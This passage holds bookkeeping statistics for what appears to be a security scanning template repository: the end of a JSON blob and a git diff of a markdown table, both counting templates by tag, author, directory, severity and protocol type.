name":"skywalking","count":1},{"name":"xproxy","count":1},{"name":"asana","count":1},{"name":"hiboss","count":1},{"name":"werkzeug","count":1},{"name":"gurock","count":1},{"name":"sqlite","count":1},{"name":"web3storage","count":1},{"name":"qualcomm","count":1},{"name":"checkmarx","count":1},{"name":"klog","count":1},{"name":"primefaces","count":1},{"name":"accent","count":1},{"name":"phpwiki","count":1},{"name":"zoomsounds","count":1},{"name":"mojoauth","count":1},{"name":"eyoucms","count":1},{"name":"strava","count":1},{"name":"shoppable","count":1},{"name":"rsa","count":1},{"name":"trello","count":1},{"name":"stytch","count":1},{"name":"spinnaker","count":1},{"name":"knowage","count":1},{"name":"rijksmuseum","count":1},{"name":"rsyncd","count":1},{"name":"dribbble","count":1},{"name":"huijietong","count":1},{"name":"beanstalk","count":1},{"name":"caddy","count":1},{"name":"interactsh","count":1},{"name":"tinymce","count":1},{"name":"dericam","count":1},{"name":"codemeter","count":1},{"name":"jumpcloud","count":1},{"name":"zenario","count":1},{"name":"xunchi","count":1},{"name":"zms","count":1},{"name":"owa","count":1},{"name":"acme","count":1},{"name":"zend","count":1},{"name":"bravenewcoin","count":1},{"name":"meraki","count":1},{"name":"oidc","count":1},{"name":"twig","count":1},{"name":"kronos","count":1},{"name":"redwood","count":1},{"name":"fcm","count":1},{"name":"varnish","count":1},{"name":"console","count":1},{"name":"moinmoin","count":1},{"name":"xdcms","count":1},{"name":"bingmaps","count":1},{"name":"arl","count":1},{"name":"emby","count":1},{"name":"cve2000","count":1},{"name":"api-manager","count":1},{"name":"dom","count":1},{"name":"xvr","count":1},{"name":"opencast","count":1},{"name":"pmb","count":1},{"name":"cgit","count":1},{"name":"clockwork","count":1},{"name":"covalent","count":1},{"name":"bible","count":1},{"name":"calendarix","count":1},{"name":"tika","count":1},{"name":"st","count":1},{"name":"gloo","count":1},{"name":"opensso","count":1},{"name":"zcms","count":1},{"name":"tplink","count":1},{"name":"clusterengine","count":1},{"name":"iconfinder","count":1},{"name":"mx","count":1},{"name":"loqate","count":1},{"name":"intellislot","count":1},{"name":"grails","count":1},{"name":"xmlchart","count":1},{"name":"atvise","count":1},{"name":"robomongo","count":1},{"name":"nomad","count":1},{"name":"biqsdrive","count":1},{"name":"doh","count":1},{"name":"defectdojo","count":1},{"name":"blue-ocean","count":1},{"name":"cassandra","count":1},{"name":"dreamweaver","count":1},{"name":"clave","count":1},{"name":"sitefinity","count":1},{"name":"comfortel","count":1},{"name":"ddownload","count":1},{"name":"catfishcms","count":1},{"name":"rmi","count":1},{"name":"fms","count":1},{"name":"blackboard","count":1},{"name":"cloudron","count":1},{"name":"nweb2fax","count":1},{"name":"xds","count":1},{"name":"camunda","count":1},{"name":"jabber","count":1},{"name":"pivotaltracker","count":1},{"name":"nutanix","count":1},{"name":"malshare","count":1},{"name":"opnsense","count":1},{"name":"zookeeper","count":1},{"name":"pyramid","count":1},{"name":"sunflower","count":1},{"name":"elementor","count":1},{"name":"directum","count":1},{"name":"gateone","count":1},{"name":"shadoweb","count":1},{"name":"webeditors","count":1},{"name":"pcoip","count":1},{"name":"tjws","count":1},{"name":"lg-nas","count":1},{"name":"wallix","count":1},{"name":"fiori","count":1},{"name":"froxlor","count":1},{"name":"logontracer","count":1},{"name":"episerver","count":1},{"name":"monitorix","count":1},{"name":"open-redirect","count":1},{"name":"xiuno","count":1},{"name":"b2bbuilder","count":1},{"name":"vnc","count":1},{"name":"imap","count":1},{"name":"cucm","count":1},{"name":"postmark","count":1},{"name":"wing-ftp","count":1},{"name":"activeadmin","count":1},{"name":"cybrotech","count":1},{"name":"gcp","count":1},{"name":"overflow","count":1},{"name":"tugboat","count":1},{"name":"kyocera","count":1},{"name":"teltonika","count":1},{"name":"jenkin","count":1},{"name":"tarantella","count":1},{"name":"tink","count":1},{"name":"tensorboard","count":1},{"name":"majordomo2","count":1},{"name":"softaculous","count":1},{"name":"virustotal","count":1},{"name":"acemanager","count":1},{"name":"dotnet","count":1},{"name":"coinapi","count":1},{"name":"scimono","count":1},{"name":"piluscart","count":1},{"name":"kerbynet","count":1},{"name":"rujjie","count":1},{"name":"sarg","count":1},{"name":"gocron","count":1},{"name":"qsan","count":1},{"name":"asanhamayesh","count":1},{"name":"jinfornet","count":1},{"name":"slstudio","count":1},{"name":"razor","count":1},{"name":"thinkadmin","count":1},{"name":"redcap","count":1},{"name":"sceditor","count":1},{"name":"tor","count":1},{"name":"timeclock","count":1},{"name":"iceflow","count":1},{"name":"idemia","count":1},{"name":"myanimelist","count":1},{"name":"gofile","count":1},{"name":"magicflow","count":1},{"name":"restler","count":1},{"name":"apple","count":1},{"name":"hiawatha","count":1},{"name":"cve2002","count":1},{"name":"totolink","count":1},{"name":"wifisky","count":1},{"name":"wix","count":1},{"name":"clink-office","count":1},{"name":"b2evolution","count":1},{"name":"maxsite","count":1},{"name":"idor","count":1},{"name":"sonarcloud","count":1},{"name":"instagram","count":1},{"name":"ipvpn","count":1},{"name":"hivemanager","count":1},{"name":"websvn","count":1},{"name":"cse","count":1},{"name":"landrayoa","count":1},{"name":"mongo-express","count":1},{"name":"iterable","count":1},{"name":"eprints","count":1},{"name":"plone","count":1},{"name":"duomicms","count":1},{"name":"h2","count":1},{"name":"short.io","count":1},{"name":"saml","count":1},{"name":"keenetic","count":1},{"name":"rmc","count":1},{"name":"bitcoinaverage","count":1},{"name":"suprema","count":1},{"name":"sourcecodester","count":1},{"name":"powercreator","count":1},{"name":"activecollab","count":1},{"name":"opensmtpd","count":1},{"name":"discord","count":1},{"name":"argocd","count":1},{"name":"spectracom","count":1},{"name":"dvr","count":1},{"name":"nps","count":1},{"name":"clickhouse","count":1},{"name":"fastapi","count":1},{"name":"esxi","count":1},{"name":"bitquery","count":1},{"name":"supervisor","count":1},{"name":"tongda","count":1},{"name":"redhat","count":1},{"name":"feifeicms","count":1},{"name":"viewlinc","count":1},{"name":"huemagic","count":1},{"name":"dahua","count":1},{"name":"lfw","count":1},{"name":"mdb","count":1},{"name":"pihole","count":1},{"name":"finereport","count":1},{"name":"visualtools","count":1},{"name":"natemail","count":1},{"name":"onkyo","count":1},{"name":"oliver","count":1},{"name":"google-earth","count":1},{"name":"webmodule-ee","count":1},{"name":"pirelli","count":1},{"name":"quip","count":1},{"name":"streetview","count":1},{"name":"shopxo","count":1},{"name":"monitorr","count":1},{"name":"rubedo","count":1},{"name":"mongoshake","count":1},{"name":"simplecrm","count":1},{"name":"metinfo","count":1},{"name":"tieline","count":1},{"name":"saltapi","count":1},{"name":"goahead","count":1},{"name":"concrete5","count":1},{"name":"fontawesome","count":1},{"name":"chinaunicom","count":1},{"name":"allied","count":1},{"name":"sureline","count":1},{"name":"plc","count":1},{"name":"nexusdb","count":1},{"name":"avtech","count":1},{"name":"secmail","count":1},{"name":"securenvoy","count":1},{"name":"spidercontrol","count":1},{"name":"myvuehelp","count":1},{"name":"realteo","count":1},{"name":"nette","count":1},{"name":"wakatime","count":1},{"name":"petfinder","count":1},{"name":"apcu","count":1},{"name":"nedi","count":1},{"name":"anchorcms","count":1},{"name":"phpfusion","count":1},{"name":"beanshell","count":1},{"name":"comodo","count":1},{"name":"unifi","count":1},{"name":"74cms","count":1},{"name":"tenda","count":1},{"name":"emessage","count":1},{"name":"ebird","count":1}],"authors":[{"name":"daffainfo","count":544},{"name":"dhiyaneshdk","count":406},{"name":"pikpikcu","count":313},{"name":"pdteam","count":257},{"name":"geeknik","count":174},{"name":"dwisiswant0","count":163},{"name":"0x_akoko","count":114},{"name":"gy741","count":109},{"name":"princechaddha","count":109},{"name":"pussycat0x","count":104},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":22},{"name":"ffffffff0x","count":21},{"name":"righettod","count":17},{"name":"idealphase","count":16},{"name":"pr3r00t","count":15},{"name":"cckuailong","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":14},{"name":"r3dg33k","count":12},{"name":"suman_kar","count":12},{"name":"sullo","count":12},{"name":"cyllective","count":11},{"name":"melbadry9","count":11},{"name":"wdahlenb","count":11},{"name":"meme-lord","count":10},{"name":"hackergautam","count":10},{"name":"alph4byt3","count":10},{"name":"nadino","count":10},{"name":"random_robbie","count":10},{"name":"emadshanab","count":9},{"name":"adam crosser","count":9},{"name":"aashiq","count":8},{"name":"johnk3r","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"dogasantos","count":7},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"logicalhunter","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"divya_mudgal","count":7},{"name":"kophjager007","count":7},{"name":"iamnoooob","count":6},{"name":"forgedhallpass","count":6},{"name":"pentest_swissky","count":6},{"name":"rootxharsh","count":6},{"name":"evan rubinstein","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"leovalcante","count":6},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"_0xf4n9x_","count":5},{"name":"joanbono","count":5},{"name":"xelkomy","count":5},{"name":"pathtaga","count":5},{"name":"imnightmaree","count":5},{"name":"ganofins","count":5},{"name":"lu4nx","count":5},{"name":"panch0r3d","count":5},{"name":"defr0ggy","count":4},{"name":"wisnupramoedya","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"tess","count":4},{"name":"dadevel","count":4},{"name":"e_schultze_","count":4},{"name":"emenalf","count":3},{"name":"johnjhacking","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"r3naissance","count":3},{"name":"_generic_human_","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"binaryfigments","count":3},{"name":"andydoering","count":3},{"name":"jarijaas","count":3},{"name":"shifacyclewala","count":3},{"name":"shine","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"sushantkamble","count":3},{"name":"impramodsargar","count":3},{"name":"skeltavik","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"gitlab red team","count":3},{"name":"dudez","count":3},{"name":"davidmckennirey","count":3},{"name":"fyoorer","count":3},{"name":"lark-lab","count":3},{"name":"github.com/its0x08","count":3},{"name":"arcc","count":3},{"name":"alifathi-h1","count":3},{"name":"edoardottt","count":3},{"name":"unstabl3","count":3},{"name":"whoever","count":3},{"name":"afaq","count":2},{"name":"mr-xn","count":2},{"name":"joeldeleep","count":2},{"name":"kiblyn11","count":2},{"name":"huowuzhao","count":2},{"name":"ree4pwn","count":2},{"name":"bananabr","count":2},{"name":"parth","count":2},{"name":"bp0lr","count":2},{"name":"gal nagli","count":2},{"name":"paperpen","count":2},{"name":"bing0o","count":2},{"name":"amsda","count":2},{"name":"ehsahil","count":2},{"name":"vsh00t","count":2},{"name":"fabaff","count":2},{"name":"foulenzer","count":2},{"name":"smaranchand","count":2},{"name":"kre80r","count":2},{"name":"random-robbie","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"mohammedsaneem","count":2},{"name":"lotusdll","count":2},{"name":"its0x08","count":2},{"name":"hetroublemakr","count":2},{"name":"convisoappsec","count":2},{"name":"paradessia","count":2},{"name":"gevakun","count":2},{"name":"y4er","count":2},{"name":"socketz","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"0xelkomy","count":2},{"name":"bernardofsr","count":2},{"name":"sy3omda","count":2},{"name":"w4cky_","count":2},{"name":"randomrobbie","count":2},{"name":"sbani","count":2},{"name":"martincodes-de","count":2},{"name":"ajaysenr","count":2},{"name":"k11h-de","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"dheerajmadhukar","count":2},{"name":"danielmofer","count":2},{"name":"nvn1729","count":2},{"name":"0xcrypto","count":2},{"name":"cckuakilong","count":2},{"name":"g4l1t0","count":2},{"name":"supras","count":2},{"name":"dahse89","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"hackerarpan","count":2},{"name":"z0ne","count":2},{"name":"cocxanh","count":2},{"name":"koti2","count":2},{"name":"x1m_martijn","count":2},{"name":"0xsapra","count":2},{"name":"vavkamil","count":2},{"name":"zomsop82","count":2},{"name":"r12w4n","count":2},{"name":"redteambrasil","count":2},{"name":"bsysop","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsmiley","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"narluin","count":1},{"name":"arr0way","count":1},{"name":"manuelbua","count":1},{"name":"schniggie","count":1},{"name":"intx0x80","count":1},{"name":"becivells","count":1},{"name":"ilovebinbash","count":1},{"name":"yuansec","count":1},{"name":"apt-mirror","count":1},{"name":"_darrenmartyn","count":1},{"name":"notsoevilweasel","count":1},{"name":"ldionmarcil","count":1},{"name":"brenocss","count":1},{"name":"nielsing","count":1},{"name":"h1ei1","count":1},{"name":"nytr0gen","count":1},{"name":"borna nematzadeh","count":1},{"name":"patralos","count":1},{"name":"shreyapohekar","count":1},{"name":"bughuntersurya","count":1},{"name":"ofjaaah","count":1},{"name":"myztique","count":1},{"name":"luqmaan hadia","count":1},{"name":"iampritam","count":1},{"name":"0xrod","count":1},{"name":"daviey","count":1},{"name":"mesaglio","count":1},{"name":"bjhulst","count":1},{"name":"0xtavian","count":1},{"name":"juicypotato1","count":1},{"name":"mah3sec_","count":1},{"name":"absshax","count":1},{"name":"knassar702","count":1},{"name":"_c0wb0y_","count":1},{"name":"xshuden","count":1},{"name":"andysvints","count":1},{"name":"tea","count":1},{"name":"exid","count":1},{"name":"mhdsamx","count":1},{"name":"for3stco1d","count":1},{"name":"0xh7ml","count":1},{"name":"shifacyclewla","count":1},{"name":"zinminphy0","count":1},{"name":"petruknisme","count":1},{"name":"0h1in9e","count":1},{"name":"mubassirpatel","count":1},{"name":"blckraven","count":1},{"name":"dawid-czarnecki","count":1},{"name":"kabirsuda","count":1},{"name":"andirrahmani1","count":1},{"name":"adrianmf","count":1},{"name":"jiheon-dev","count":1},{"name":"akshansh","count":1},{"name":"zandros0","count":1},{"name":"un-fmunozs","count":1},{"name":"ooooooo_q","count":1},{"name":"geraldino2","count":1},{"name":"lark lab","count":1},{"name":"miroslavsotak","count":1},{"name":"revblock","count":1},{"name":"taielab","count":1},{"name":"thevillagehacker","count":1},{"name":"0ut0fb4nd","count":1},{"name":"thezakman","count":1},{"name":"0xd0ff9","count":1},{"name":"kareemse1im","count":1},{"name":"qlkwej","count":1},{"name":"evan rubinstien","count":1},{"name":"undefl0w","count":1},{"name":"yashanand155","count":1},{"name":"gboddin","count":1},{"name":"furkansenan","count":1},{"name":"retr0","count":1},{"name":"elmahdi","count":1},{"name":"willd96","count":1},{"name":"noobexploiter","count":1},{"name":"noamrathaus","count":1},{"name":"j33n1k4","count":1},{"name":"infosecsanyam","count":1},{"name":"ok_bye_now","count":1},{"name":"tim_koopmans","count":1},{"name":"streetofhackerr007","count":1},{"name":"rotemreiss","count":1},{"name":"udyz","count":1},{"name":"rojanrijal","count":1},{"name":"push4d","count":1},{"name":"droberson","count":1},{"name":"hakluke","count":1},{"name":"0xteles","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"wabafet","count":1},{"name":"hexcat","count":1},{"name":"co0nan","count":1},{"name":"brabbit10","count":1},{"name":"yashgoti","count":1},{"name":"whynotke","count":1},{"name":"florianmaak","count":1},{"name":"b0rn2r00t","count":1},{"name":"jeya.seelan","count":1},{"name":"vzamanillo","count":1},{"name":"kiks7","count":1},{"name":"pratik khalane","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"alperenkesk","count":1},{"name":"d4vy","count":1},{"name":"ggranjus","count":1},{"name":"tirtha_mandal","count":1},{"name":"kailashbohara","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"omarkurt","count":1},{"name":"akash.c","count":1},{"name":"deena","count":1},{"name":"evolutionsec","count":1},{"name":"yavolo","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"kaizensecurity","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"act1on3","count":1},{"name":"anon-artist","count":1},{"name":"thebinitghimire","count":1},{"name":"skylark-lab","count":1},{"name":"jeya seelan","count":1},{"name":"soyelmago","count":1},{"name":"lethargynavigator","count":1},{"name":"3th1c_yuk1","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"akincibor","count":1},{"name":"aresx","count":1},{"name":"xstp","count":1},{"name":"2rs3c","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"ringo","count":1},{"name":"0xceba","count":1},{"name":"makyotox","count":1},{"name":"ahmed abou-ela","count":1},{"name":"momen eldawakhly","count":1},{"name":"x6263","count":1},{"name":"compr00t","count":1},{"name":"clarkvoss","count":1},{"name":"philippdelteil","count":1},{"name":"hanlaomo","count":1},{"name":"coldfish","count":1},{"name":"orpheus","count":1},{"name":"fopina","count":1},{"name":"charanrayudu","count":1},{"name":"dhiyaneshdki","count":1},{"name":"ahmed sherif","count":1},{"name":"majidmc2","count":1},{"name":"ahmetpergamum","count":1},{"name":"shelld3v","count":1},{"name":"osamahamad","count":1},{"name":"exploitation","count":1},{"name":"veshraj","count":1},{"name":"ohlinge","count":1},{"name":"bad5ect0r","count":1},{"name":"th3.d1p4k","count":1},{"name":"alex","count":1},{"name":"zsusac","count":1},{"name":"52971","count":1},{"name":"jrolf","count":1},{"name":"flag007","count":1},{"name":"luci","count":1},{"name":"alevsk","count":1},{"name":"s1r1u5_","count":1},{"name":"jbaines-r7","count":1},{"name":"izn0u","count":1},{"name":"affix","count":1},{"name":"elder tao","count":1},{"name":"jas37","count":1},{"name":"luskabol","count":1},{"name":"pdp","count":1},{"name":"thesubtlety","count":1},{"name":"c3l3si4n","count":1},{"name":"regala_","count":1},{"name":"aaronchen0","count":1},{"name":"nerrorsec","count":1},{"name":"ipanda","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"b0yd","count":1},{"name":"official_blackhat13","count":1},{"name":"kurohost","count":1},{"name":"raesene","count":1},{"name":"berkdusunur","count":1},{"name":"furkansayim","count":1},{"name":"d0rkerdevil","count":1},{"name":"retr02332","count":1},{"name":"zhenwarx","count":1},{"name":"sshell","count":1},{"name":"b4uh0lz","count":1},{"name":"remonsec","count":1},{"name":"jteles","count":1},{"name":"ritikchaddha","count":1},{"name":"sicksec","count":1},{"name":"cookiehanhoan","count":1},{"name":"chron0x","count":1},{"name":"prettyboyaaditya","count":1},{"name":"oscarintherocks","count":1},{"name":"luqman","count":1},{"name":"micha3lb3n","count":1},{"name":"_harleo","count":1},{"name":"toufik-airane","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"fmunozs","count":1},{"name":"rubina119","count":1},{"name":"notnotnotveg","count":1},{"name":"mass0ma","count":1},{"name":"sickwell","count":1},{"name":"pudsec","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"igibanez","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"rodnt","count":1},{"name":"harshinsecurity","count":1},{"name":"fq_hsu","count":1},{"name":"sec_hawk","count":1},{"name":"husain","count":1},{"name":"elouhi","count":1},{"name":"manasmbellani","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1}],"directory":[{"name":"cves","count":1061},{"name":"exposed-panels","count":447},{"name":"vulnerabilities","count":421},{"name":"technologies","count":227},{"name":"exposures","count":199},{"name":"misconfiguration","count":188},{"name":"workflows","count":185},{"name":"token-spray","count":147},{"name":"default-logins","count":77},{"name":"takeovers","count":67},{"name":"file","count":57},{"name":"iot","count":36},{"name":"network","count":35},{"name":"miscellaneous","count":22},{"name":"dns","count":17},{"name":"cnvd","count":16},{"name":"fuzzing","count":11},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1067},{"name":"high","count":789},{"name":"medium","count":622},{"name":"critical","count":384},{"name":"low","count":169},{"name":"unknown","count":6}],"types":[{"name":"http","count":2905},{"name":"file","count":57},{"name":"network","count":49},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index aac397ee3a..83e5c09f4a 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,1368 +1,1387 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 | -| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 | -| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 | -| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 | -| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | | -| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | | -| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | | -| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | | -| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | | +| cve | 1056 | daffainfo | 544 | cves | 1061 | info | 1067 | http | 2905 | +| panel | 446 | dhiyaneshdk | 406 | exposed-panels | 447 | high | 789 | file | 57 | +| lfi | 430 | pikpikcu | 313 | vulnerabilities | 421 | medium | 622 | network | 49 | +| xss | 335 | pdteam | 257 | technologies | 227 | critical | 384 | dns | 17 | +| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 169 | | | +| exposure | 282 | dwisiswant0 | 163 | misconfiguration | 188 | unknown | 6 | | | +| rce | 268 | 0x_akoko | 114 | workflows | 185 | | | | | +| cve2021 | 251 | princechaddha | 109 | token-spray | 147 | | | | | +| tech | 238 | gy741 | 109 | default-logins | 77 | | | | | | wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | | -| cve2020 | 188 | madrobot | 65 | file | 57 | | | | | +| cve2020 | 191 | madrobot | 65 | file | 57 | | | | | | | 186 | zzeitlin | 64 | iot | 36 | | | | | | token-spray | 147 | gaurang | 42 | network | 35 | | | | | | joomla | 130 | philippedelteil | 36 | miscellaneous | 22 | | | | | -| config | 116 | ice3man | 26 | cnvd | 16 | | | | | -| apache | 115 | organiccrap | 24 | dns | 16 | | | | | -| cve2019 | 114 | ffffffff0x | 21 | fuzzing | 11 | | | | | -| cve2018 | 112 | righettod | 17 | headless | 6 | | | | | -| cve2010 | 110 | pr3r00t | 15 | ssl | 4 | | | | | -| iot | 96 | sheikhrishad | 15 | | | | | | | -| oast | 91 | c-sh0 | 15 | | | | | | | -| default-login | 84 | milo2012 | 14 | | | | | | | -| login | 83 | idealphase | 14 | | | | | | | -| unauth | 81 | cckuailong | 14 | | | | | | | +| config | 116 | ice3man | 26 | dns | 17 | | | | | +| apache | 115 | organiccrap | 24 | cnvd | 16 | | | | | +| cve2018 | 114 | c-sh0 | 22 | fuzzing | 11 | | | | | +| cve2019 | 114 | ffffffff0x | 21 | headless | 6 | | | | | +| cve2010 | 110 | righettod | 17 | ssl | 4 | | | | | +| iot | 97 | idealphase | 16 | | | | | | | +| oast | 91 | sheikhrishad | 15 | | | | | | | +| default-login | 87 | cckuailong | 15 | | | | | | | +| login | 84 | pr3r00t | 15 | | | | | | | +| unauth | 82 | milo2012 | 14 | | | | | | | | takeover | 73 | techbrunchfr | 14 | | | | | | | -| token | 69 | r3dg33k | 12 | | | | | | | -| redirect | 63 | suman_kar | 12 | | | | | | | -| misconfig | 61 | sullo | 12 | | | | | | | -| cve2017 | 59 | wdahlenb | 11 | | | | | | | -| file | 57 | melbadry9 | 11 | | | | | | | -| ssrf | 55 | cyllective | 11 | | | | | | | -| sqli | 53 | nadino | 10 | | | | | | | -| network | 52 | alph4byt3 | 10 | | | | | | | -| oracle | 45 | hackergautam | 10 | | | | | | | +| token | 69 | suman_kar | 12 | | | | | | | +| redirect | 64 | sullo | 12 | | | | | | | +| misconfig | 62 | r3dg33k | 12 | | | | | | | +| cve2017 | 60 | melbadry9 | 11 | | | | | | | +| file | 57 | cyllective | 11 | | | | | | | +| ssrf | 55 | wdahlenb | 11 | | | | | | | +| sqli | 53 | meme-lord | 10 | | | | | | | +| network | 52 | hackergautam | 10 | | | | | | | +| oracle | 45 | nadino | 10 | | | | | | | | cve2016 | 44 | random_robbie | 10 | | | | | | | -| router | 41 | meme-lord | 10 | | | | | | | -| disclosure | 41 | adam crosser | 9 | | | | | | | -| plugin | 39 | emadshanab | 9 | | | | | | | +| disclosure | 42 | alph4byt3 | 10 | | | | | | | +| router | 41 | emadshanab | 9 | | | | | | | +| plugin | 39 | adam crosser | 9 | | | | | | | | cve2014 | 37 | iamthefrogy | 8 | | | | | | | -| google | 36 | aashiq | 8 | | | | | | | -| cisco | 35 | johnk3r | 8 | | | | | | | -| logs | 34 | that_juan_ | 8 | | | | | | | -| auth-bypass | 34 | zh | 8 | | | | | | | -| cve2015 | 34 | techryptic (@tech) | 7 | | | | | | | -| atlassian | 31 | kophjager007 | 7 | | | | | | | -| wp | 31 | divya_mudgal | 7 | | | | | | | -| listing | 30 | logicalhunter | 7 | | | | | | | -| jira | 30 | randomstr1ng | 7 | | | | | | | -| injection | 28 | oppsec | 7 | | | | | | | -| traversal | 28 | harshbothra_ | 7 | | | | | | | -| authenticated | 28 | dogasantos | 7 | | | | | | | -| generic | 25 | 0x240x23elu | 7 | | | | | | | -| proxy | 22 | dr_set | 7 | | | | | | | -| sap | 21 | puzzlepeaches | 6 | | | | | | | +| cisco | 35 | zh | 8 | | | | | | | +| google | 35 | that_juan_ | 8 | | | | | | | +| logs | 34 | johnk3r | 8 | | | | | | | +| cve2015 | 34 | aashiq | 8 | | | | | | | +| auth-bypass | 34 | harshbothra_ | 7 | | | | | | | +| wp | 31 | oppsec | 7 | | | | | | | +| atlassian | 31 | techryptic (@tech) | 7 | | | | | | | +| jira | 30 | dr_set | 7 | | | | | | | +| listing | 30 | kophjager007 | 7 | | | | | | | +| authenticated | 28 | 0x240x23elu | 7 | | | | | | | +| traversal | 28 | divya_mudgal | 7 | | | | | | | +| injection | 28 | dogasantos | 7 | | | | | | | +| generic | 25 | logicalhunter | 7 | | | | | | | +| cve2022 | 23 | randomstr1ng | 7 | | | | | | | +| proxy | 22 | pentest_swissky | 6 | | | | | | | +| sap | 21 | iamnoooob | 6 | | | | | | | | fuzz | 21 | evan rubinstein | 6 | | | | | | | -| cve2022 | 20 | leovalcante | 6 | | | | | | | -| aem | 20 | iamnoooob | 6 | | | | | | | -| service | 20 | rootxharsh | 6 | | | | | | | -| debug | 20 | __fazal | 6 | | | | | | | -| misc | 20 | pentest_swissky | 6 | | | | | | | -| cve2012 | 19 | forgedhallpass | 6 | | | | | | | -| springboot | 19 | caspergn | 6 | | | | | | | -| intrusive | 18 | pathtaga | 5 | | | | | | | -| php | 18 | panch0r3d | 5 | | | | | | | -| adobe | 18 | lu4nx | 5 | | | | | | | -| wp-theme | 18 | yanyun | 5 | | | | | | | -| microsoft | 18 | _0xf4n9x_ | 5 | | | | | | | -| vmware | 18 | ganofins | 5 | | | | | | | -| cms | 18 | joanbono | 5 | | | | | | | -| dns | 17 | imnightmaree | 5 | | | | | | | -| weblogic | 17 | xelkomy | 5 | | | | | | | -| deserialization | 17 | elsfa7110 | 5 | | | | | | | -| cnvd | 16 | tess | 4 | | | | | | | -| ibm | 16 | nodauf | 4 | | | | | | | -| aws | 16 | wisnupramoedya | 4 | | | | | | | -| manageengine | 16 | e_schultze_ | 4 | | | | | | | -| devops | 15 | incogbyte | 4 | | | | | | | -| jenkins | 15 | dadevel | 4 | | | | | | | -| cve2011 | 15 | defr0ggy | 4 | | | | | | | -| xxe | 14 | github.com/its0x08 | 3 | | | | | | | -| cve2009 | 14 | 0w4ys | 3 | | | | | | | -| zoho | 14 | shine | 3 | | | | | | | +| adobe | 21 | puzzlepeaches | 6 | | | | | | | +| service | 20 | caspergn | 6 | | | | | | | +| aem | 20 | __fazal | 6 | | | | | | | +| debug | 20 | forgedhallpass | 6 | | | | | | | +| misc | 20 | rootxharsh | 6 | | | | | | | +| cve2012 | 19 | leovalcante | 6 | | | | | | | +| springboot | 19 | imnightmaree | 5 | | | | | | | +| vmware | 19 | lu4nx | 5 | | | | | | | +| cms | 18 | elsfa7110 | 5 | | | | | | | +| microsoft | 18 | xelkomy | 5 | | | | | | | +| php | 18 | ganofins | 5 | | | | | | | +| wp-theme | 18 | panch0r3d | 5 | | | | | | | +| dns | 18 | _0xf4n9x_ | 5 | | | | | | | +| intrusive | 18 | yanyun | 5 | | | | | | | +| deserialization | 17 | pathtaga | 5 | | | | | | | +| weblogic | 17 | joanbono | 5 | | | | | | | +| ibm | 16 | incogbyte | 4 | | | | | | | +| cnvd | 16 | defr0ggy | 4 | | | | | | | +| aws | 16 | nodauf | 4 | | | | | | | +| manageengine | 16 | wisnupramoedya | 4 | | | | | | | +| zoho | 15 | e_schultze_ | 4 | | | | | | | +| jenkins | 15 | tess | 4 | | | | | | | +| cve2011 | 15 | dadevel | 4 | | | | | | | +| devops | 15 | skeltavik | 3 | | | | | | | +| cve2009 | 14 | whoever | 3 | | | | | | | +| struts | 14 | fyoorer | 3 | | | | | | | +| dlink | 14 | github.com/its0x08 | 3 | | | | | | | +| android | 14 | johnjhacking | 3 | | | | | | | +| xxe | 14 | _generic_human_ | 3 | | | | | | | | gitlab | 14 | thomas_from_offensity | 3 | | | | | | | -| android | 14 | 